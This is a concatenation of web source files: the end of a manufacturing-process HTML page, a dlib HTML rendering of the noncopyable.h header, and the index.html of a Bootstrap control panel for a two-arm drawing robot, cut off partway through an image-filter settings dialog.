href="../parts/part_epoxy_resin_bottle.html">Epoxy&nbsp;Resin&nbsp;Bottle</a></td> <td></li></td> </tr> </table></p> <br/> 4. Process Outputs : <p><table><ul> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>1.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a href="../parts/part_gas_tank.html">Gas&nbsp;Tank</a></td> <td></li></td> </tr> </ul></table></p> <br/><hr><a href="../processes/processes.html">Back To Processes Overview</a></br></br> </TT> </body> </html>
Network/dlib-19.7/docs/dlib/noncopyable.h.html
kjhsdgf/Collin-Neural-Network
<html><!-- Created using the cpp_pretty_printer from the dlib C++ library. See http://dlib.net for updates. --><head><title>dlib C++ Library - noncopyable.h</title></head><body bgcolor='white'><pre> <font color='#009900'>// (C) Copyright Beman Dawes 1999-2003. Distributed under the Boost </font><font color='#009900'>// Software License, Version 1.0. (See accompanying file </font><font color='#009900'>// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) </font><font color='#009900'>// Contributed by Dave Abrahams </font><font color='#009900'>// See http://www.boost.org/libs/utility for documentation. </font> <font color='#0000FF'>#ifndef</font> DLIB_BOOST_NONCOPYABLE_HPP_INCLUDED <font color='#0000FF'>#define</font> DLIB_BOOST_NONCOPYABLE_HPP_INCLUDED <font color='#0000FF'>namespace</font> dlib <b>{</b> <font color='#0000FF'>class</font> <b><a name='noncopyable'></a>noncopyable</b> <b>{</b> <font color='#009900'>/*! This class makes it easier to declare a class as non-copyable. If you want to make an object that can't be copied just inherit from this object. !*/</font> <font color='#0000FF'>protected</font>: <b><a name='noncopyable'></a>noncopyable</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#5555FF'>=</font> <font color='#0000FF'>default</font>; ~<b><a name='noncopyable'></a>noncopyable</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#5555FF'>=</font> <font color='#0000FF'>default</font>; <font color='#0000FF'>private</font>: <font color='#009900'>// emphasize the following members are private </font> <b><a name='noncopyable'></a>noncopyable</b><font face='Lucida Console'>(</font><font color='#0000FF'>const</font> noncopyable<font color='#5555FF'>&amp;</font><font face='Lucida Console'>)</font>; <font color='#0000FF'>const</font> noncopyable<font color='#5555FF'>&amp;</font> <b><a name='operator'></a>operator</b><font color='#5555FF'>=</font><font face='Lucida Console'>(</font><font color='#0000FF'>const</font> noncopyable<font color='#5555FF'>&amp;</font><font face='Lucida Console'>)</font>; <b>}</b>; <b>}</b> <font color='#0000FF'>#endif</font> <font color='#009900'>// DLIB_BOOST_NONCOPYABLE_HPP_INCLUDED </font> </pre></body></html>
index.html
RJFeddeler/DrawBotPanel
<!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous"> <!-- Font Awesome CSS --> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"> <!-- Animate CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" integrity="sha256-j+P6EZJVrbXgwSR5Mx+eCS6FvP9Wq27MBRC/ogVriY0=" crossorigin="anonymous" /> <!-- Bootstrap-Slider CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-slider/9.9.0/css/bootstrap-slider.css" integrity="sha256-ojWMuaS8gb0NLkgeKWnsdM24QKxM+UWOq3r+VrKgv68=" crossorigin="anonymous" /> <!-- My CSS --> <link type="text/css" rel="stylesheet" href="css/general.css"/> <link type="text/css" rel="stylesheet" href="css/home.css"/> <link type="text/css" rel="stylesheet" href="css/draw.css"/> <link type="text/css" rel="stylesheet" href="css/upload.css"/> <link type="text/css" rel="stylesheet" href="css/wifi.css"/> <link type="text/css" rel="stylesheet" href="css/settings.css"/> <!-- JQuery, Popper, and Bootstrap JS --> <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-slider/9.9.0/bootstrap-slider.js" integrity="sha256-17b/iGtqUrqcCSivVVRYvREag1R2ka4j3rIDlhw3J0g=" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4" crossorigin="anonymous"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1" crossorigin="anonymous"></script> <!-- Load program scripts and objects --> <script type="text/javascript" src="js/filetype_rob.js"></script> <script type="text/javascript" src="js/nav.js"></script> <script type="text/javascript" src="js/home.js"></script> <script type="text/javascript" src="js/draw.js"></script> <script type="text/javascript" src="js/upload.js"></script> <script type="text/javascript" src="js/effects.js"></script> <script type="text/javascript" src="js/my_filters.js"></script> <script type="text/javascript" src="js/canny.js"></script> <script type="text/javascript" src="js/trace.js"></script> <script type="text/javaScript" src="js/point.js"></script> <script type="text/javaScript" src="js/line.js"></script> <script type="text/javaScript" src="js/application.js"></script> <script type="text/javaScript" src="js/energy_graph.js"></script> <script type="text/javaScript" src="js/preview.js"></script> <script type="text/javaScript" src="js/overview.js"></script> <script type="text/javaScript" src="js/simulated_annealing.js"></script> <script type="text/javascript" src="js/file_list.js"></script> <script type="text/javascript" src="js/state_data.js"></script> </head> <body> <!-- Alert --> <div id="myAlert" class="alertCommon text-center rounded"> <p id="alertHeading" class="mb-0"></p><center><hr class="trim"/></center><p id="alertBody" class="mt-2"></p> </div> <!-- NavBar code --> <nav class="nav navbar navbar-expand-lg navbar-dark bg-primary shadow2"> <a class="navbar-brand" href="#"></a> <img class="logo" src="images/logo.png" /> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarText"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarText"> <div class="navbar-nav ml-nav mr-auto"> <a class="nav-item nav-link margin-lg" data-toggle="tab" href="#Home" id="nav-home"><i class="fa fa-home fa-2x fa-fw theme-color1"></i></a> <a class="nav-item nav-link margin-lg" data-toggle="tab" href="#Draw" id="nav-draw"><i class="fa fa-pencil-square-o fa-2x fa-fw theme-color1"></i></a> <a class="nav-item nav-link margin-lg" data-toggle="tab" href="#Upload" id="nav-upload"><i class="fa fa-upload fa-2x fa-fw theme-color1"></i></a> </div> <div class="navbar-nav ml-auto"> <a class="nav-item nav-link margin-sm" data-toggle="tab" href="#Wifi" id="nav-wifi"><i class="fa fa-wifi fa-2x fa-fw theme-color1"></i></a> <a class="nav-item nav-link margin-sm" data-toggle="tab" href="#Settings" id="nav-settings"><i class="fa fa-cog fa-2x fa-fw theme-color1"></i></a> </div> </div> </nav> <div class="container card-gap-top"> <div class="tab-content"> <div class="tab-pane pane-home" id="Home" role="tabpanel"> <div class="row"> <div class="col-lg-4"> <div class="row"> <!-- Card: System --> <div class="col"> <div class="card home-system bg-primary shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>System</h5> </div> <div class="card-body pb-0 pt-3"> <div class="d-flex"> <!-- Names List Group --> <ul class="list-group list-name-size"> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">DrawBot State:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Drawing Speed:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Movement Speed:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Print Area:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-value-size"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idRobotState"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idDrawingSpeed"></div> <div class="list-units unit-speed font-sm"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idMovementSpeed"></div> <div class="list-units unit-speed font-sm"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idPrintAreaWidth"></div> <div class="list-units unit-length font-sm"></div> <div class="card-list list-divider font-sm" id="idPrintAreaSeparator"></div> <div class="card-list font-sm" id="idPrintAreaHeight"></div> <div class="list-units unit-length font-sm"></div> </div> </li> </ul> </div> </div> </div> </div> </div> <div class="row"> <!-- Card: Memory Card --> <div class="col"> <div class="card home-memorycard bg-primary shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Memory Card</h5> </div> <div class="card-body pb-0 pt-3"> <div class="d-flex"> <!-- Names List Group --> <ul class="list-group list-name-size"> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Card Type:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Label:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Free Space:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Used Space:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-value-size"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idMemCardType"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idMemCardLabel"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idMemCardFreeSpace"></div> <div class="list-units unit-storage font-sm"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idMemCardUsedSpace"></div> <div class="list-units unit-storage font-sm"></div> <div class="card-list list-divider font-sm" id="idMemCardSeparator"></div> <div class="card-list font-sm" id="idMemCardCapacity"></div> <div class="list-units unit-storage font-sm"></div> </div> </li> </ul> </div> </div> </div> </div> </div> <div class="row"> <!-- Card: Network --> <div class="col"> <div class="card home-network bg-primary shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Network</h5> </div> <div class="card-body pb-0"> <div class="d-flex"> <!-- Names List Group --> <ul class="list-group list-name-size"> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Connection Status:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Mode:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">SSID:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Signal Strength:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Security:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">DHCP:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">IP Address:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Gateway:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-value-size"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiStatus"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiMode"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiSSID"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiSignalStrength"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiSecurity"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiDHCP"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiIP"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idWifiGateway"></div> </div> </li> </ul> </div> </div> </div> </div> </div> </div> <div class="col-lg-2"> <!-- Card: Arms --> <div class="card home-arms bg-primary shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Arms</h5> </div> <div class="card-body pt-2 pb-0"> <div class="row"> <div class="col-12 text-center lineheight-xs mb-2 mt-2"> <span class="badge badge-common badge-color1" id="arm_dont_need_this">Arm 1</span> <span class="badge badge-common badge-color2">Arm 2</span> </div> </div> <div class="row"> <div class="col-12 trim"> <div class="card arms_arm"> <div class="card-header card-title-arm text-center rounded pt-0 mt-0"> <strong>Shoulder</strong> </div> <div class="card-body trim" id="arms_stepper1"> <div class="text-center lineheight-xs"> <div class="arms-text">Range:</div> <span class="badge badge-common badge-color1">2000</span> <span class="badge badge-common badge-color2">2000</span> <div class="arms-text">Steps per Rev:</div> <span class="badge badge-common badge-color1">400</span> <span class="badge badge-common badge-color2">400</span> <div class="arms-text">Microstep:</div> <span class="badge badge-common badge-color1">32</span> <span class="badge badge-common badge-color2">32</span> </div> </div> </div> </div> </div> <div class="row"> <div class="col-12 trim"> <div class="card arms_arm"> <div class="card-header card-title-arm text-center rounded pt-0 mt-0"> <strong>Elbow</strong> </div> <div class="card-body trim" id="arms_stepper1"> <div class="text-center lineheight-xs"> <div class="arms-text">Range:</div> <span class="badge badge-common badge-color1">2500</span> <span class="badge badge-common badge-color2">2500</span> <div class="arms-text">Steps per Rev:</div> <span class="badge badge-common badge-color1">400</span> <span class="badge badge-common badge-color2">400</span> <div class="arms-text">Microstep:</div> <span class="badge badge-common badge-color1">32</span> <span class="badge badge-common badge-color2">32</span> </div> </div> </div> </div> </div> <div class="row"> <div class="col-12 trim"> <div class="card arms_arm"> <div class="card-header card-title-arm text-center rounded pt-0 mt-0"> <strong>Hand</strong> </div> <div class="card-body trim" id="arms_stepper1"> <div class="text-center lineheight-xs"> <div class="arms-text">Range:</div> <span class="badge badge-common badge-color1">200</span> <span class="badge badge-common badge-color2">200</span> <div class="arms-text">Down Position:</div> <span class="badge badge-common badge-color1">160</span> <span class="badge badge-common badge-color2">160</span> <div class="arms-text">Up Position:</div> <span class="badge badge-common badge-color1">90</span> <span class="badge badge-common badge-color2">90</span> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-lg-6"> <div class="row"> <!-- Card: Overview --> <div class="col"> <div class="card home-overview bg-primary shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Overview</h5> </div> <div class="card-body pb-1 pt-2"> <div id="home-overview" class="text-center mt-2" style="width: 500px; height: 240px"> </div> </div> </div> </div> </div> <div class="row"> <!-- Card: Progress --> <div class="col"> <div class="card home-progress bg-primary pb-2 shadow"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Progress</h5> </div> <div class="card-body pb-0 pt-3"> <div id="home_progress" class="progress"> <div class="progress-bar progress-bar-striped progress-bar-animated" role="progressbar" style="width: 50%"><strong>50%</strong></div> </div> <div class="d-flex mt-2"> <!-- Names List Group --> <ul class="list-group list-prog-sm list-prog-name"> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Elapsed Time:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Lines Drawn:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-prog-md"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idProgressTime1A">88</div> <div class="list-units unit-time-hr font-sm" id="idProgressTimeUnit1A"></div> <div class="card-list list-divider font-sm progress-separator"></div> <div class="card-list font-sm" id="idProgressTime1B">88</div> <div class="list-units unit-time-min font-sm" id="idProgressTimeUnit1B"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idProgressLine1">88</div> <div class="list-units unit-length font-sm"></div> </div> </li> </ul> <!-- Names List Group --> <ul class="list-group list-prog-lg list-prog-name"> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Time Remaining:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm trim"> <div class="card-list font-sm">Lines Remaining:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-prog-md"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idProgressTime2A">88</div> <div class="list-units unit-time-hr font-sm" id="idProgressTimeUnit2A"></div> <div class="card-list list-divider font-sm progress-separator"></div> <div class="card-list font-sm" id="idProgressTime2B">88</div> <div class="list-units unit-time-min font-sm" id="idProgressTimeUnit2B"></div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="idProgressLine2">88</div> <div class="list-units unit-length font-sm"></div> </div> </li> </ul> </div> <div class="row"> <div class="card progress_arm pb-0 mr-auto"> <div class="card-header card-title-arm text-center rounded pt-0 mt-0"> <strong>Arm 1</strong> </div> <div class="card-body trim" id="prog_arm1"> <div class="d-flex"> <!-- Names List Group --> <ul class="list-group list-name-size2"> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Position:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Lines Drawn:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Pen Position:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-value-size"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_1">1000, 2000</div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_2">455 of 1200</div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_3">Up</div> </div> </li> </ul> </div> </div> </div> <div class="card progress_arm pb-0 ml-auto"> <div class="card-header card-title-arm text-center rounded pt-0 mt-0"> <strong>Arm 2</strong> </div> <div class="card-body trim" id="prog_arm2"> <div class="d-flex"> <!-- Names List Group --> <ul class="list-group list-name-size2"> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Position:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Lines Drawn:</div> </li> <li class="list-group-item list-name flex-column lineheight-sm py-0 pr-2"> <div class="card-list font-sm">Pen Position:</div> </li> </ul> <!-- Values List Group --> <ul class="list-group list-value-size"> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_1">1000, 2000</div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_2">455 of 1200</div> </div> </li> <li class="list-group-item list-value flex-column lineheight-sm trim"> <div class="d-flex ml-2"> <div class="card-list font-sm" id="arm1_3">Down</div> </div> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- end tab-pane (Home) --> <div class="tab-pane pane-draw" id="Draw" role="tabpanel"> <div class="row"> <div class="col-md-12"> <div id="accordion" role="tablist"> <div class="card card-no-pad-bottom draw-filemanager bg-primary shadow"> <span data-toggle="collapse" href="#filemanager-body"> <div class="card-header card-title-stripe text-white text-center shadow2" role="tab" id="filemanager-heading"> <h5>File Manager</h5> </div> </span> <div class="collapse show" role="tabpanel" data-parent="#accordion" id="filemanager-body"> <div class="card-body trim"> <div class="row no-height"> <div class="col icon-links icon-links-pos" id="filemanager-menu"> <a href="#" class="dropdown-toggle ml-3" data-toggle="dropdown"><i class="fa fa-bars fa-lg fa-fw"></i></a> <ul class="dropdown-menu shadow2"> <li class="dropdown-item"> <a href="#"><i class="fa fa-refresh fa-xs fa-fw"></i> Refresh</a> </li> <li class="dropdown-item dropdown-submenu"> <a href="#"><i class="fa fa-sliders fa-xs fa-fw"></i> View</a> <ul class="dropdown-menu shadow2"> <li><a href="#" class="dropdown-item interaction">Details</a></li> <li><a href="#" class="dropdown-item interaction">Preview Large</a></li> <li><a href="#" class="dropdown-item interaction">Preview Med</a></li> <li><a href="#" class="dropdown-item interaction">Preview Small</a></li> <li><a href="#" class="dropdown-item interaction">Name</a></li> </ul> </li> <li class="dropdown-item dropdown-submenu"> <a href="#"><i class="fa fa-sort-amount-desc fa-xs fa-fw"></i> Sort</a> <ul class="dropdown-menu shadow2"> <li><a href="#" class="dropdown-item interaction">Date</a></li> <li><a href="#" class="dropdown-item interaction">File Size</a></li> <li><a href="#" class="dropdown-item interaction">Dimensions</a></li> <li><a href="#" class="dropdown-item interaction">Time</a></li> </ul> </li> <li class="dropdown-item"> <div class="input-group search-sm"> <input class="form-control trim" type="text" placeholder="Search query..."> <span class="input-group-addon trim" id="searchBox"><i class="fa fa-search fa-xs fa-fw"></i></span> </div> </li> </ul> </div> </div> <div class="row"> <div class="card-deck justify-content-center" id="file-container"> </div> </div> </div> </div> </div> <div class="card card-no-bottom draw-freedraw bg-primary trim shadow"> <div class="card-header card-title-stripe text-white text-center shadow2" id="freedraw-heading" role="tab"> <span class="collapsed" data-toggle="collapse" href="#freedraw-body"> <h5>Free Draw</h5> </span> </div> <div class="collapse white-links" role="tabpanel" data-parent="#accordion" id="freedraw-body"> <div class="card-body text-center"> <!-- <div class="btn-group btn-group-sm mr-4" data-toggle="buttons"> <label class="btn btn-secondary active"> <input type="radio" name="options" id="opt-position-absolute" autocomplete="off" checked> Absolute </label> <label class="btn btn-secondary"> <input type="radio" name="options" id="opt-position-relative" autocomplete="off"> Relative </label> </div> --> <a href="#"><i id="draw_line" class="fa fa-minus fa-lg fa-fw"></i></a> <a href="#"><i id="draw_square" class="fa fa-square-o fa-lg fa-fw"></i></a> <a href="#"><i id="draw_circle" class="fa fa-circle-thin fa-lg fa-fw"></i></a> <a href="#"><i id="draw_htext" class="fa fa-text-width fa-lg fa-fw"></i></a> <a href="#"><i id="draw_vtext" class="fa fa-text-height fa-lg fa-fw"></i></a> <a href="#"><i id="draw_pencil" class="fa fa-pencil fa-lg fa-fw"></i></a> <a href="#"><i id="draw_undo" class="fa fa-undo fa-lg fa-fw"></i></a> </div> </div> </div> </div> </div> </div> </div> <!-- end tab-pane (Draw) --> <div class="tab-pane pane-upload" id="Upload" role="tabpanel"> <div class="row"> <div class="col-md-7"> <div class="card bg-primary shadow pb-0" id="upload-viewport"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Viewport</h5> </div> <div class="card-body pb-0 mb-0"> <div class="scale_input scale-fade rounded shadow2" id="input-group-scale"> <div class="input-group input-group-sm"> <input type="text" class="form-control" id="preview_scale" maxlength="3" value="100"> <div class="input-group-btn" id="scale_group_btn"> <button type="button" class="btn btn-secondary" style="opacity: 1" disabled>%</button> <button type="button" class="btn btn-primary dropdown-toggle" id="btn_scale_dropdown" data-toggle="dropdown"> <i class="fa fa-caret-down"></i> </button> <div class="dropdown-menu dropdown-menu-right" id="scale_dropdown"> <a class="dropdown-item" id="scale_100" href="#">100%</a> <a class="dropdown-item" id="scale_75" href="#">75%</a> <a class="dropdown-item" id="scale_50" href="#">50%</a> <a class="dropdown-item" id="scale_25" href="#">25%</a> </div> </div> </div> </div> <div class="row"> <div class="col"> <div class="d-flex justify-content-center canvas-style mt-0 mb-1 rounded shadow2" id="viewport-drawing" style="height: 320px"> </div> </div> </div> <div class="row"> <div class="col"> <div class="d-flex justify-content-center canvas-style mt-1 mb-0 rounded shadow2" id="viewport-energy"> </div> </div> </div> <div class="row"> <div class="col"> <p class="upload-status small trim mt-1">Slowest Time: </p> </div> <div class="col"> <p class="upload-status small trim mt-1">Fastest Time: </p> </div> <div class="col"> <p class="upload-status small trim mt-1">Lowest Energy: </p> </div> </div> </div> </div> </div> <div class="col-md-5"> <div class="row"> <div class="col"> <div class="d-flex chooser-margins"> <label class="input-group-btn"> <span class="btn btn-primary chooser-btn"> Browse&hellip; <input type="file" id="fileInput" accept=".rob, .png, .jpg, .jpeg, .bmp, .svg" style="display: none;" > </span> </label> <input type="text" class="form-control chooser-input" id="fileInputText" placeholder="(No file selected)" readonly> </div> </div> </div> <div class="row"> <div class="col"> <div class="card bg-primary shadow pb-0" id="upload-options"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Options</h5> </div> <div class="card-body mb-0 pb-0"> <div class="d-flex justify-content-center" id="form-algorithm"> <form> <div class="row"> <div class="col"> <div class="form-group"> <label class="form-control-label mr-sm-2" for="form-select-algorithm">Algorithm</label> <select id="form-select-algorithm" class="form-control form-control-sm form-select-algo"> <option>Simulated Annealing</option> </select> </div> </div> <div class="col"> <div class="form-group"> <label class="form-control-label mr-sm-2" for="form-select-subalgorithm">Sub-Algorithm</label> <select id="form-select-subalgorithm" class="form-control form-control-sm form-select-algo"> <option>Hill Climbing</option> <option>Genetic</option> </select> </div> </div> </div> <div class="row"> <div class="col"> <hr class="mt-3 mb-2"/> </div> </div> <div class="row"> <div class="col"> <div class="form-group"> <label class="form-control-label mr-sm-2" for="initial_temperature">Initial Temperature</label> <input type="text" id="initial_temperature" class="form-control form-control-sm" value="35.0"> </div> <div class="form-group"> <label class="form-control-label mr-sm-2" for="cooling_factor">Cooling Factor</label> <input type="text" id="cooling_factor" class="form-control form-control-sm" value="0.05"> </div> </div> <div class="col"> <div class="form-group"> <label class="form-control-label mr-sm-2" for="initial_stabilizer">Initial Stabilizer</label> <input type="text" id="initial_stabilizer" class="form-control form-control-sm" value="35.0"> </div> <div class="form-group"> <label class="form-control-label mr-sm-2" for="stabilizing_factor">Stabilizing Factor</label> <input type="text" id="stabilizing_factor" class="form-control form-control-sm" value="1.005"> </div> </div> <div class="col"> <div class="form-group"> <label class="form-control-label mr-sm-2" for="freezing_temperature">Freezing Temp</label> <input type="text" id="freezing_temperature" class="form-control form-control-sm" value="0.0"> </div> </div> </div> <div class="row"> <div class="col"> <hr class="mt-3 mb-0"/> </div> </div> <div class="row"> <div class="col"> <div class="d-flex justify-content-center align-items-center"> <button class="btn btn-icon-white" id="btn-anneal-pause"><i class="fa fa-pause-circle fa-2x fa-fw"></i></button> <button class="btn btn-icon-white" id="btn-anneal-start"><i class="fa fa-play-circle fa-4x fa-fw"></i></button> <button class="btn btn-icon-white" id="btn-anneal-stop"><i class="fa fa-stop-circle fa-2x fa-fw"></i></button> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="row"> <div class="col"> <div class="card bg-primary shadow" id="upload-options"> <div class="card-header card-title-stripe text-white text-center shadow2"> <h5>Results</h5> </div> <div class="card-body"> <div class="d-flex justify-content-center" id="upload-results"> </div> </div> </div> </div> </div> </div> </div> </div> <!-- end tab-pane (Upload) --> <div class="tab-pane pane-wifi" id="Wifi" role="tabpanel"> <h1>Wifi</h1> </div> <!-- end tab-pane (Wifi) --> <div class="tab-pane pane-settings" id="Settings" role="tabpanel"> <h1>Settings</h1> </div> <!-- end tab-pane (Settings) --> </div> </div> <div class="modal modal-wide fade" id="imgFilterModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title">Image Filter Settings</h5> <button type="button" class="close" data-dismiss="modal"> <span>&times;</span> </button> </div> <div class="modal-body"> <div class="container-fluid"> <div class="row"> <div class="col-md-8" id="modal-col"> <canvas id="modal-canvas"></canvas> <canvas class="rounded" id="zoom-canvas"></canvas> </div> <div class="col-md-4" id="imgFilterSettings"> <div class="row"> <div class="card pb-0"> <div class="card-header pt-0 pb-0"> Gaussian Blur </div> <div class="card-body pt-0 pb-1"> <div> <label class="lbl-sm">Kernel Size: <strong id="sliderVal_blurKernel">0</strong></label><br> <input id="filter_blurKernel" data-slider-id='filter_slider1' type="text" data-slider-min="3" data-slider-max="21" data-slider-step="2" data-slider-value="3"> </div> <div> <label class="lbl-sm">Sigma: <strong id="sliderVal_blurSigma">0</strong></label><br> <input id="filter_blurSigma" data-slider-id='filter_slider2' type="text" data-slider-precision="1" data-slider-min="1.0" data-slider-max="10.0" data-slider-step=".1" data-slider-value="1.5"> </div> </div> </div> </div> <div class="row"> <div class="card pb-0 mb-1"> <div class="card-header pt-0 pb-0"> Edge Detection </div> <div class="card-body pt-2 pb-1"> <center> <div class="btn-group btn-group-sm mb-1" id="form-input-cannyAlgorithm" data-toggle="buttons"> <label class="btn btn-secondary active"> <input type="radio" 